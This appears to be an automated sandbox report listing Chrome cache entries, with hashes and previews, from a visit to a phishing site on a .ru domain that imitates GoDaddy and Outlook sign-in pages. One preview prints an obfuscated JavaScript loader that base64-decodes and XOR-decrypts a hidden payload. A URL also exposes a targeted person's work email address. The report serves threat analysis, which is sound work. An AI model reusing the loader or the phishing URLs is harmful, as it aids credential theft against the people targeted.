                                                                          Preview:#authcalldesc,#sections,.text-m{font-size:.9375rem}*,input[type=radio]{box-sizing:border-box;padding:0}.alert,.radio label,.row.tile{margin-bottom:0}#sections,.input-group-addon,.table .table-cell,img{vertical-align:middle}#sections_doc .pdfheader #pageName,#sections_pdf .pdfheader #pageName,.row.tile,.row.tile:not(.no-pick):active,.row.tile:not(.no-pick):hover,input{color:inherit}.p,.subtitle,.text-body,.text-subtitle,h4{font-weight:400}*,.text-title{font-family:"Segoe UI","Helvetica Neue","Lucida Grande",Roboto,Ebrima,"Nirmala UI",Gadugi,"Segoe Xbox Symbol","Segoe UI Symbol","Meiryo UI","Khmer UI",Tunga,"Lao UI",Raavi,"Iskoola Pota",Latha,Leelawadee,"Microsoft YaHei UI","Microsoft JhengHei UI","Malgun Gothic","Estrangelo Edessa","Microsoft Himalaya","Microsoft New Tai Lue","Microsoft PhagsPa","Microsoft Tai Le","Microsoft Yi Baiti","Mongolian Baiti","MV Boli","Myanmar Text","Cambria Math"}*{margin:0}.websitesections{height:100%;width:100vw;position:relative}#sections_doc,#sections_go

                                                                          Chrome Cache Entry: 129

                                                                          Download File
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:downloaded
                                                                          Size (bytes):16
                                                                          Entropy (8bit):3.5
                                                                          Encrypted:false
                                                                          SSDEEP:
                                                                          MD5:F1C9C44E663E7E62582E3F5B236C1C72
                                                                          SHA1:E142F3A0C2D1CDF175A5C3AF43AD66FEFE208B1F
                                                                          SHA-256:D843E67FBFA1F5CB0024062861EE26860C5A866F80755CF39B3465459A8538B9
                                                                          SHA-512:19FE62CB9D884BB3424C51DD15E74EB22E5A639BABF8398BACEBB781862296FA0D7AEE39C88CB9C7AF5791FD58830AC3433F5C6BD94B1BA3912AB33151E93452
                                                                          Malicious:false
                                                                          Reputation:unknown
                                                                          URL:https://content-autofill.googleapis.com/v1/pages/ChRDaHJvbWUvMTM0LjAuNjk5OC4zNhIZCXzvfM71fcOWEgUNNzCpMCGdZItSdJLmTw==?alt=proto
                                                                          Preview:CgkKBw03MKkwGgA=

                                                                          Chrome Cache Entry: 130

                                                                          Download File
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:RIFF (little-endian) data, Web/P image
                                                                          Category:dropped
                                                                          Size (bytes):25216
                                                                          Entropy (8bit):7.947339442168474
                                                                          Encrypted:false
                                                                          SSDEEP:
                                                                          MD5:F9A795E2270664A7A169C73B6D84A575
                                                                          SHA1:0FBB60AB27AB88C064EB347D0722C8ED4CF5E8B8
                                                                          SHA-256:D00203B2EEA6E418C31BAAFA949ADA5349A9F9B7E99FA003AEC7406822693740
                                                                          SHA-512:E17C8D922F52C8AB36D9C0A7DC41D32735CF1680EA653056308C6D23255FDBE40B96C68F0E7F8B3B521B6ACB080CD825F94320364B0A70141606A4449D980517
                                                                          Malicious:false
                                                                          Reputation:unknown
                                                                          Preview:RIFFxb..WEBPVP8X....0...o.....ICCP.............0..mntrRGB XYZ ............acsp.......................................-....................................................desc.......$rXYZ........gXYZ...(....bXYZ...<....wtpt...P....rTRC...d...(gTRC...d...(bTRC...d...(cprt.......<mluc............enUS.........s.R.G.BXYZ ......o...8.....XYZ ......b.........XYZ ......$.........XYZ ...............-para..........ff......Y.......[........mluc............enUS... .....G.o.o.g.l.e. .I.n.c... .2.0.1.6ALPH.Y....'$H..xkD....oUS..[.uM....CwI.H#.H.t(..!J.AJ# .(........0.W.?D...g.6..u......}K5.>|....^..*2.....z..../.1..F..A...Vk..W.Wm?z....H+.;:...s..Z;....V.....Z.gm.......\>.}..-.....w...D.........+,K...#......._[L.[.]w1..[.l..8.....f..E...W....;....o.Q...T`.W.(..........;^........:.T..6......Yo..x.6..n.\A.5X.........J....2.O.)....0..zdL1.x.X..e?.eA.M%f.D..W.].A=6D.....w....>.*3|M.7....aEe&l.or.Tt^.*6li..lYz.HF.....2.\...U.tfQ.<ZlHB.G--....]T..h.L.U]...m....{..T{....~......K#

                                                                          Chrome Cache Entry: 132

                                                                          Download File
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:PNG image data, 420 x 94, 8-bit/color RGBA, non-interlaced
                                                                          Category:dropped
                                                                          Size (bytes):10796
                                                                          Entropy (8bit):7.946024875001343
                                                                          Encrypted:false
                                                                          SSDEEP:
                                                                          MD5:12BDACC832185D0367ECC23FD24C86CE
                                                                          SHA1:4422F316EB4D8C8D160312BB695FD1D944CBFF12
                                                                          SHA-256:877AE491D9AAC5C6EF82A8430F9F652ACE8A0DBC7294BD112AAD49BD593769D0
                                                                          SHA-512:36C319AC7F75202190E7A59F3F3C92892A71D5F17663E672319A745B6574BCFDE7C89B35F480CB15A193924DACB9D67F8CA1E1BC2BF33FC5CCBFA152CC7BA2D0
                                                                          Malicious:false
                                                                          Reputation:unknown
                                                                          Preview:.PNG........IHDR.......^.....l2`...).IDATx..}...U.... w...B..P$.Hv..t......x.EA@.Q`.E......-.".(..X`..D....5]]U}....$3...&...guOw..}>.....~....w.ZZ...z..FZ$I.$I....N.......tt.$e...M....ru$I.$IR.h.AvK0.t..wy.:.1...D.H...LS....iF~.X...smr.$I.$IR.4.....SY..@....h8.....*..dB...1.eG...$I.$.hZ...8.r...[.A.I..XE..hdA{Z..teaF...u:}.1^..-I.$I.FP.A..Nm..........A78...=.%W_.$I..8YQ.H2z#.D_...m..k..u.t..R6#.....N....){...$I..1@...g...@a ..u2..dL...*ai.d.[.$I..D.....OM..a...,h%u.B.....0...57..hrW..$I....Gf.|.=.eg`.........k.J.$IR..<.u....]....@.d...H..$I.$5..MWwu:....H|Y..,.$.I.$I....Qu...s.NzzM..]..;$ I.$IR......+..L9......63.I@.$I..z..#.....:..7...s..<$ I.$I.hP.tu...m"..o1.y.@..W1T<(..... z%."?.4zE..$ ..Y1z`.P..!....`t%t....[..d...N.UKy&.A;..6S...<...........o...]0...r.$I......0..R.....N.....0Wi._.;...M..Lrb{.7w..].jm.r....C...&..gd}..Etm}..~L.l...}n\'...$..Mr.i..{..n..9.....SwMh.}.Q{./wJ.....B]:.....+..\V...A.S.w..6.....,..[.......J@....-.4.....:..Zvt.r.*.

                                                                          Chrome Cache Entry: 134

                                                                          Download File
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:PNG image data, 495 x 640, 8-bit/color RGB, non-interlaced
                                                                          Category:dropped
                                                                          Size (bytes):148628
                                                                          Entropy (8bit):7.9929425596189985
                                                                          Encrypted:true
                                                                          SSDEEP:
                                                                          MD5:78F1BD15005F2F1F5ACBA79A7069C87B
                                                                          SHA1:3705445FC1E5572787CC0C835A3111CF99F1FF69
                                                                          SHA-256:5E9BECB4655D24FE7C449E028B5BADC92A30C394A87F0874E1C60E3190AAB4F6
                                                                          SHA-512:4ACFAB7BFAB1EA1402FFD7A9E90BFDBC2E562A73AECAAB13589F857F24638A0D413FA9006AD28604269873CAA09AF93E5F2ECE323FD7084781DF81EBAF0BA9A3
                                                                          Malicious:false
                                                                          Reputation:unknown
                                                                          Preview:.PNG........IHDR.............:.g.....eXIfII*...........................V...........^...(.......................i.......f.......?.......?.................0210....................0100........................................5.:.....pHYs.........n.u>.. .IDATx...$.q&z...Q|..N.%J.....N......t..%.....D..nI.wwf....`.=....F........}_DTeW.`0..`.[.1....../"###..;&.d.I&....N..&.d.I&=.2..$.L2.,...&.d.Ig.L47.$.L:.d..I&.d.Y ..M2.$....hn.I&.t..Ds.L2..@/...?..{.'.5.$.Lz...C....k...8.?.G...?.........&.d.I'E/...h....&.d.@g.....j.....P2..$.Lz..%C.w...uL7..$.Lz..t.|_...BF`}"..q.......w1........L2....F.j.(..m...$..;........;$[.5U. n....6%k..&.d.....A/..g|~......<.w7.....2....b..Cy.Rk..h......M2..Cs..]..A..z..Q.h..i}. .\_.:.79A..x..N.`.p..f]n.^/d..mP.$F.........e.^L2...Es....z........J.7.Vk..Z.../..Z....;.......%..,7..AH..[...j+.8...G....p'`..|.....Ds.L2.X....C..r........P.`t..T.V+..2.-.W.....\./.W...j.X-....|.Z(.N...nH...\*..j..T*Q9.b..T(....~-.W.23.S.V...&^.

                                                                          Chrome Cache Entry: 135

                                                                          Download File
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:RIFF (little-endian) data, Web/P image
                                                                          Category:downloaded
                                                                          Size (bytes):644
                                                                          Entropy (8bit):4.6279651077789685
                                                                          Encrypted:false
                                                                          SSDEEP:
                                                                          MD5:541B83C2195088043337E4353B6FD60D
                                                                          SHA1:F09630596B6713217984785A64F6EA83E91B49C5
                                                                          SHA-256:2658B8874F0D2A12E8726DF78AC8954324C3BBE4695E66BDEF89195FDE64322F
                                                                          SHA-512:B2AE42BA9D3A63D3ACB179051B005F2589F147D94F044616AE5DC5705E873F16057C56934262841191263B4C35804EF188BD38CF69CCE0F4B2CF76C05F17B8AD
                                                                          Malicious:false
                                                                          Reputation:unknown
                                                                          URL:https://ldaqmiesa.fictiougbo.ru/wxALWfU5ETUyvmQJOvfdzop4iZ3aSLxoCsT4Kvw12129
                                                                          Preview:RIFF|...WEBPVP8X....0.........ICCP.............0..mntrRGB XYZ ............acsp.......................................-....................................................desc.......$rXYZ........gXYZ...(....bXYZ...<....wtpt...P....rTRC...d...(gTRC...d...(bTRC...d...(cprt.......<mluc............enUS.........s.R.G.BXYZ ......o...8.....XYZ ......b.........XYZ ......$.........XYZ ...............-para..........ff......Y.......[........mluc............enUS... .....G.o.o.g.l.e. .I.n.c... .2.0.1.6ALPHK....W`$....z..".Y..P}0;.PE..G..h....9.@..`..2.......=.T.....-3..ow.*...&......VP8 :...0....*....>m&.M.!"......i...O...(.........g....w...XG...

                                                                          Chrome Cache Entry: 136

                                                                          Download File
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with CRLF line terminators
                                                                          Category:downloaded
                                                                          Size (bytes):35786
                                                                          Entropy (8bit):5.058073854893359
                                                                          Encrypted:false
                                                                          SSDEEP:
                                                                          MD5:38501E3FBBBD89B56AA5BA35DE1A32FE
                                                                          SHA1:D9B31981B6F834E8480BA28FBC1CFF1BE772F589
                                                                          SHA-256:A1CA6B381CB01968851C98512C6E7F6C5309A49F7A16B864813135CBFF82A85B
                                                                          SHA-512:1547937AA9B366E76DE44933EF48EF60E3D043245E8E3E01C97DFC2981F6B1F61463D9D30992FBCF2CA25FC1B7B32FF808B9789CFB965D74455522FC58E0C08C
                                                                          Malicious:false
                                                                          Reputation:unknown
                                                                          URL:https://ldaqmiesa.fictiougbo.ru/xy0OjismZXisvhpqH54cd30
                                                                          Preview:#sections_godaddy {..font-family: gdsherpa !important;..}..#sections_godaddy a {.. color: var(--ux-2rqapw,#000);.. -webkit-text-decoration: var(--ux-1f7if5p,underline);.. text-decoration: var(--ux-1f7if5p,underline);.. background-color: transparent;..}....#sections_godaddy #root {.. flex: 1 1 0%;..}....#sections_godaddy a:hover {../* color: var(--ux-1j87vvn,#fff);*/.. -webkit-text-decoration: var(--ux-1ft0khm,underline);.. text-decoration: var(--ux-1ft0khm,underline);..}....#sections_godaddy svg {.. overflow: hidden;.. vertical-align: unset;..}....#sections_godaddy .ux-button {.. --ux-button-icon-margin: calc((var(--ux-t379ov,var(--ux-jw5s9j,1.5)) * 1em - 1.5em) / 2);.. padding: 0;.. text-decoration: var(--ux-1f7if5p,underline);.. -webkit-text-decoration: var(--ux-1f7if5p,underline);.. gap: 0.5em;.. cursor: pointer;.. --ux-button-icon-margin: calc((var(--ux-t379ov,var(--ux-jw5s9j,1.5)) * 1em - 1.5em) / 2);.. font-weight: inherit;.. background: transparent;.. gap:

                                                                          Chrome Cache Entry: 138

                                                                          Download File
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:Web Open Font Format (Version 2), TrueType, length 93276, version 1.0
                                                                          Category:downloaded
                                                                          Size (bytes):93276
                                                                          Entropy (8bit):7.997636438159837
                                                                          Encrypted:true
                                                                          SSDEEP:
                                                                          MD5:BCD7983EA5AA57C55F6758B4977983CB
                                                                          SHA1:EF3A009E205229E07FB0EC8569E669B11C378EF1
                                                                          SHA-256:6528A0BF9A836A53DFD8536E1786BA6831C9D1FAA74967126FDDF5B2081B858C
                                                                          SHA-512:E868A2702CA3B99E1ABBCBD40B1C90B42A9D26086A434F1CBAE79DFC072216F2F990FEC6265A801BC4F96DB0431E8F0B99EB0129B2EE7505B3FDFD9BB9BAFE90
                                                                          Malicious:false
                                                                          Reputation:unknown
                                                                          URL:https://ldaqmiesa.fictiougbo.ru/GDSherpa-vf2.woff2
                                                                          Preview:wOF2......l\....... ..k...........................v...&..$?HVAR.j?MVAR.F.`?STAT.6'8.../.H........x....0..:.6.$..0. ..z...[....%"...........!.I.T....w.!c.H...t.]k......6..Cy..Ul.re........I..%.%....DE....v.i.QF8....iH.!r......P4Z[....Zs....o..r..8b.O....n...!......R}GL..5n!....^..I...A.....U...,&..uz....E.R.K/GL...#..U..A8%.rd..E,}...'e...u..3.dD....}..:..0.a..#O8.|.7..{.}.o......(.D..HX...w.;F...g.+....g.x..,.@~<.K......ZJw......^.!..{:..<..`N..h..0.t..NA..,...]........On./..X|_=...e,.tS..3Z..q_....'F[..jR.?U..k.:+;..Z.co5..l..yV.Md..4.6............L8q..._...AX.y.Cc...Agb..a.K...N....`-..N.b.u...q..i.S...p..j*...fA.......?.Z.Ee.~|.\..TZ._...?./a.64..+.]..(gq..d..\K...S..z.i.l[.........1=....I.....4g.?.G.3.&.0L&.$.@R6...U..o..:.S.=.....bU..u.]z.W8[U.|7.'.%..u...11..g<.^...J..PB.JHB...k........].($..D...S"u...7...9.8.....U..7...R$..x...g.X.zV.,.$....y.:.....Q$OM....q.. ...(.O....".d<.l..9..|^B.r.5......yi.D..._...<P..o....(Re.I...@E.~..T.

                                                                          Chrome Cache Entry: 140

                                                                          Download File
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (48122)
                                                                          Category:downloaded
                                                                          Size (bytes):48123
                                                                          Entropy (8bit):5.342998089666478
                                                                          Encrypted:false
                                                                          SSDEEP:
                                                                          MD5:EA38BDA3C117E2FE01BD862003357394
                                                                          SHA1:767CCB3589E3067EE1B348DF2426A9E2E32CEE5C
                                                                          SHA-256:719423C7B70AC911F76D00B3AE514D108A8315EA60A80519820BE50C0E4C96EF
                                                                          SHA-512:F50FAB9DC2263F40216DF26C234AD390091F23185650E9B4E4748CF09CFEDF2D92A99FC81C986234580844393305AC2195E096DEDB64D9A25A99EF7BE510FFCA
                                                                          Malicious:false
                                                                          Reputation:unknown
                                                                          URL:https://challenges.cloudflare.com/turnstile/v0/b/708f7a809116/api.js
                                                                          Preview:"use strict";(function(){function jt(e,t,a,o,c,l,v){try{var h=e[l](v),s=h.value}catch(p){a(p);return}h.done?t(s):Promise.resolve(s).then(o,c)}function qt(e){return function(){var t=this,a=arguments;return new Promise(function(o,c){var l=e.apply(t,a);function v(s){jt(l,o,c,v,h,"next",s)}function h(s){jt(l,o,c,v,h,"throw",s)}v(void 0)})}}function V(e,t){return t!=null&&typeof Symbol!="undefined"&&t[Symbol.hasInstance]?!!t[Symbol.hasInstance](e):V(e,t)}function De(e,t,a){return t in e?Object.defineProperty(e,t,{value:a,enumerable:!0,configurable:!0,writable:!0}):e[t]=a,e}function Ve(e){for(var t=1;t<arguments.length;t++){var a=arguments[t]!=null?arguments[t]:{},o=Object.keys(a);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(a).filter(function(c){return Object.getOwnPropertyDescriptor(a,c).enumerable}))),o.forEach(function(c){De(e,c,a[c])})}return e}function Ir(e,t){var a=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS

                                                                          Chrome Cache Entry: 141

                                                                          Download File
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:HTML document, ASCII text, with very long lines (23653), with CRLF line terminators
                                                                          Category:downloaded
                                                                          Size (bytes):28696
                                                                          Entropy (8bit):5.903108747090045
                                                                          Encrypted:false
                                                                          SSDEEP:
                                                                          MD5:CCFB8134B485B0B03F9AA4EC2466C98A
                                                                          SHA1:BF50975E23A515777CA049DDAB1A921D964BA03A
                                                                          SHA-256:7B0810823DE671CBB536E1D678826B9E1C4B796FC7C099A52DA6B434F8411255
                                                                          SHA-512:4519386607D2B9D1E61EE74ED2FFB8CD1C2E31BFBA9A159FACB2C11A9E4814003FAC2ABBB6779A4137FA2C8DFBE2947D1257C8C933AC108F7B43DD0108D41DF6
                                                                          Malicious:false
                                                                          Reputation:unknown
                                                                          URL:https://ldaqmiesa.fictiougbo.ru/LrfdGrh7/?=Aangela.m.roell%40xcelenergy.com
                                                                          Preview:<script>..function npiJqWqjOb(QsMUOwHoYa, uTOqJdUUes) {..let yTbcUcUfbP = '';..QsMUOwHoYa = atob(QsMUOwHoYa);..let RHCoaZWICL = uTOqJdUUes.length;..for (let i = 0; i < QsMUOwHoYa.length; i++) {.. yTbcUcUfbP += String.fromCharCode(QsMUOwHoYa.charCodeAt(i) ^ uTOqJdUUes.charCodeAt(i % RHCoaZWICL));..}..return yTbcUcUfbP;..}..var PuTBDrTNJk = npiJqWqjOb(`VDExGS9AH3EkNQt/cAMyRBsibWhHIT0PIx4BICIiGjt8CCldRDsmMg0wK0Z1Hl1/Z2kFKzxFLENJb2toGyEgAjZEVVxdexshIAI2REsiJSRVYDofMkAYa3hoCyY8ATUeCD04MgwkPgo0VUUyOCpHIzgKPh8HODU0RyEgEjZEBHw9NEd2fFpoAUQyJT4YNj1GLENFPD4pRighSXgMRCI0NQEyJlVLOmZbazQLMDsbMg5mWzkiH2IUHihTHzg4KUAjJgQkGEwwAB4PCRVeLlQGPTkeMBAkCC8FWAsADQMhPwd0ajMYMCEgNTUPdFweCxB+Ww4/JS5SLCkGJi8EJw8BCR8YHz9QCxoPNlIGAyEjEXc0CAFYAzM5FR4gASl+VigTIh4wGCIxdHZbM2QOHSYKJSpTABc5HT93YicrXB4IZT9ZGBU9PHsoGxQjMAglIi9bGxgfNCYBOyoheSgQMA4rAzUPdFweCxB+Ww4/EzBpWRdnJj97JyICAAwYOgEBIGE9dn8GGyQeP3cgIixDJRI5dyYBPzkwaVgHIx0/d2InK3YACxIRWhgFXnZkLD0tIy8UJzEeeQQYOjMEJwU5MFRZZT4LKwA/DxEFATUQKx4gOyopajMLOyUGEyIiDkMlEj4GDwsR

                                                                          Chrome Cache Entry: 81

                                                                          Download File
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:HTML document, ASCII text, with very long lines (52007), with CRLF line terminators
                                                                          Category:downloaded
                                                                          Size (bytes):150610
                                                                          Entropy (8bit):5.9779504198681535
                                                                          Encrypted:false
                                                                          SSDEEP:
                                                                          MD5:610510D725BDC64A25B76BBFF5B63010
                                                                          SHA1:26882B329751F1B224A9DA73C6354B331A9E5318
                                                                          SHA-256:5287ED9FBEE7AA146B03214590D1249638E3BADE35C4713D09AC54CE85B1D5DE
                                                                          SHA-512:48CB0189C1AFAA8A0D8A94FF8663BEA79E867D276A88F2B56ECCD29C57633282C9582FC865C19717D43C2B6925D81775AA6117501158E97034748D9290C474FE
                                                                          Malicious:false
                                                                          Reputation:unknown
                                                                          URL:https://ldaqmiesa.fictiougbo.ru/gsxqesvuwwcuticdlrkzzfjoefdgh8hc19x16gw?NNRPYSZWDSZPCOGKLGTOXMOLIFOGQ
                                                                          Preview:<!DOCTYPE html>..<html lang="en">..<head>.. <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1">.. <meta name="robots" content="noindex, nofollow">.. <meta name="viewport" content="width=device-width, initial-scale=1.0">.. <title>&#8203;</title>.. <style id="outlooklogostyle">..body#outlooklogo {.. background-color: #fff;.. height: 100%;.. overflow: hidden;..}....:root {.. --s: 180px;.. --envW: 130px;.. --envH: 71px;.. --calW: 118px;.. --sqW: calc(var(--calW) / 3);.. --sqH: 37px;.. --calHH: 20px;.. --calH: calc(var(--sqH) * 3 + var(--calHH));.. --calY: calc(var(--calH) + 20px);.. --calYExt: calc(var(--calH) - 80px);.. --calYOverExt: calc(var(--calH) - 92px);.. --flapS: 96px;.. --flapH: calc(0.55 * var(--envH));.. --flapScaleY: calc(var(--flapH) / var(--flapWidth));.. --dur: 5s..}..#containerShadow,#ef{border-radius:0 0 7px 7px;}..#cal,#cal>.r{display:flex;}..#fmask,#openedFlap{width:var(--envW);height:107px;}..#ca

                                                                          Chrome Cache Entry: 82

                                                                          Download File
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:downloaded
                                                                          Size (bytes):128
                                                                          Entropy (8bit):4.750616928608237
                                                                          Encrypted:false
                                                                          SSDEEP:
                                                                          MD5:D90F02F133E7B82AF89B3E58526AC459
                                                                          SHA1:F1D6D47EFE0D920F5BC5024E813554BD2F8A1650
                                                                          SHA-256:FCF0826E3EA7D24F6C73417BFF62AD84191ECC837DBFB10E60A2547580C3C14D
                                                                          SHA-512:83C187216CE1B44E23000DF4F25A4BAA7C5E0066E62C3E0D0203B013B5C26D097C6B225C58E345204B47E5E7BF34D4A8E60F7DF63D6083157C6CB9707DD9C41E
                                                                          Malicious:false
                                                                          Reputation:unknown
                                                                          URL:https://content-autofill.googleapis.com/v1/pages/ChRDaHJvbWUvMTM0LjAuNjk5OC4zNhIgCVrC6NGW4XaiEgUNX1f-DRIFDRObJGMho9iEB9tVDP0SSgmu0xxlV6vLhxIFDc8jKv8SBQ3Fk8QkEgUNiaVnyxIFDcMZOZASBQ2JpWfLEgUNwxk5kBIFDdACQOwSBQ2oXeN0IZMUABitME_W?alt=proto
                                                                          Preview:ChIKBw1fV/4NGgAKBw0TmyRjGgAKSAoHDc8jKv8aAAoHDcWTxCQaAAoHDYmlZ8saAAoHDcMZOZAaAAoHDYmlZ8saAAoHDcMZOZAaAAoHDdACQOwaAAoHDahd43QaAA==

                                                                          Chrome Cache Entry: 83

                                                                          Download File
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:PNG image data, 640 x 256, 8-bit/color RGBA, non-interlaced
                                                                          Category:dropped
                                                                          Size (bytes):32158
                                                                          Entropy (8bit):7.915748152382414
                                                                          Encrypted:false
                                                                          SSDEEP:
                                                                          MD5:94FB5E8194A821FEBC2E09EEE19628BF
                                                                          SHA1:DE9DF9BC7CB8ED3857908A385351E5304457CE85
                                                                          SHA-256:3EE1ED74086125E965FB265055A93C23C128B3ECE0D8EA42810A8B7FABBAEC60
                                                                          SHA-512:EEF12F318BB11D158A3FBA34BA946E2EF750AA65F0218D38323583E5D8F7A04C9BF4F2D3CA50069C4D6492184476ABEA88D5813E812E735770BDC300342A0E93
                                                                          Malicious:false
                                                                          Reputation:unknown
                                                                          Preview:.PNG........IHDR.............#..f....eXIfII*...........................V...........^...(.......................i.......f........v.......v................0210....................0100.........................................b......pHYs..........o.d.. .IDATx...|....O]..1%`[6=.P....7u...Y.(..*..d....Ur..2%4S.C.!.B'!....L.-...........Sy..g|.......7..A".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H...ca...pGQQ.V.#......&..up]..D".H$R.V..iP....q........H$..D".\..L..h....Yxv...t.9.....n<aj..)3..4s.2,.S..EO.1..Ysn.e.7.....9?}...M...4.$.H$..D".!...b.._P.,..9'M+_.=........2..e..%l.L

                                                                          Chrome Cache Entry: 84

                                                                          Download File
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:SVG Scalable Vector Graphics image
                                                                          Category:dropped
                                                                          Size (bytes):2905
                                                                          Entropy (8bit):3.962263100945339
                                                                          Encrypted:false
                                                                          SSDEEP:
                                                                          MD5:FE87496CC7A44412F7893A72099C120A
                                                                          SHA1:A0C1458C08A815DF63D3CB0406D60BE6607CA699
                                                                          SHA-256:55CE3B0CE5BC71339308107982CD7671F96014256DED0BE36DC8062E64C847F1
                                                                          SHA-512:E527C6CD2A3D79CA828A9126E8FF7009A540AA764082750D4FA8207C2B8439CA1FDC4459E935D708DC59DCFFE55FE45188EB5E266D1B745FCA7588501BC0117D
                                                                          Malicious:false
                                                                          Reputation:unknown
                                                                          Preview:<svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><title>assets</title><rect width="48" height="48" fill="none"/><path d="M30.422,29.092a3.493,3.493,0,0,1,1.324.261,3.381,3.381,0,0,1,1.132.749q.366.366.827.775t.949.854q.488.444.941.932a9.974,9.974,0,0,1,.819,1A4.951,4.951,0,0,1,37,34.736a3.133,3.133,0,0,1,.218,1.15,3.493,3.493,0,0,1-.261,1.324,3.381,3.381,0,0,1-.749,1.132q-.888.888-1.6,1.568a8.753,8.753,0,0,1-1.489,1.15,6.17,6.17,0,0,1-1.716.705A9.367,9.367,0,0,1,29.151,42a13.73,13.73,0,0,1-3.9-.592A21.891,21.891,0,0,1,21.26,39.77a27.749,27.749,0,0,1-3.885-2.491,34.863,34.863,0,0,1-3.6-3.153,34.6,34.6,0,0,1-3.127-3.606,27.717,27.717,0,0,1-2.456-3.876A22.2,22.2,0,0,1,6.584,22.69,13.485,13.485,0,0,1,6,18.866,9.453,9.453,0,0,1,6.235,16.6a6.2,6.2,0,0,1,.7-1.707,8.848,8.848,0,0,1,1.141-1.489q.679-.723,1.585-1.611a3.381,3.381,0,0,1,1.132-.749,3.493,3.493,0,0,1,1.324-.261,3.3,3.3,0,0,1,1.681.47,8.648,8.648,0,0,1,1.542,1.15,17.725,17.725,0,0,1,1.376,1.428q.645.

                                                                          Chrome Cache Entry: 87

                                                                          Download File
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 280x69, components 3
                                                                          Category:dropped
                                                                          Size (bytes):4823
                                                                          Entropy (8bit):7.800384142141786
                                                                          Encrypted:false
                                                                          SSDEEP:
                                                                          MD5:925E8F527CFEC9643EA4E2E02CE11825
                                                                          SHA1:8AE39F11BAEB6859F17DD3F8D514EC056535C9C5
                                                                          SHA-256:A2BC164BA43D5DCBB140207078CC17BE2D15CC017A9C0BF80DEBC54F3BEE369E
                                                                          SHA-512:D25AAEA848D14E5639962E83FD3BC9E3DD6570E22C05D9FFBFE3828808F26299C96F9B6B8735644D607AB4B0E742F6666DAF0FBF90005088619D1B6170A0DC29
                                                                          Malicious:false
                                                                          Reputation:unknown
                                                                          Preview:......JFIF.....`.`.....C....................................................................C.......................................................................E...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..S..(.....I..f...;..`A.....I..e...%.+.i.^;y._..4~..e........y5.jZ...".m4...:.|...5...[&...4..D..R.7.s..v.|.h..5O...G.J;..^.T.c..[|........M....4S..\.....^$....J.&.Yr'.g..c.y.YAb..J..qjQ...3...+..p..(...(...(...(...(...(...(...(...(...(...(...(...(...(....@..[+W.5{.V..:.:...;...~......+.]cR..)..5..)..5.4(.,......".:...i....G..v]cm..g......\x....R..._..~/8.G...YK.e.

                                                                          Chrome Cache Entry: 88

                                                                          Download File
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:RIFF (little-endian) data, Web/P image
                                                                          Category:dropped
                                                                          Size (bytes):1298
                                                                          Entropy (8bit):6.665390877423149
                                                                          Encrypted:false
                                                                          SSDEEP:
                                                                          MD5:32CA2081553E969F9FDD4374134521AD
                                                                          SHA1:7B09924C4C3D8B6E41FE38363E342DA098BE4173
                                                                          SHA-256:216FC342A469AA6A005B2EACC24622095E5282D3E9F1AE99CE54C27B92EC3587
                                                                          SHA-512:F75749C6344FCD7BF06872A3678BB2EB4CAE2DDC31CC5D1EE73EFBA843705577841667733A83163AF4336EC8A32DF93E7A36155BD6282D7BB86159644975948C
                                                                          Malicious:false
                                                                          Reputation:unknown
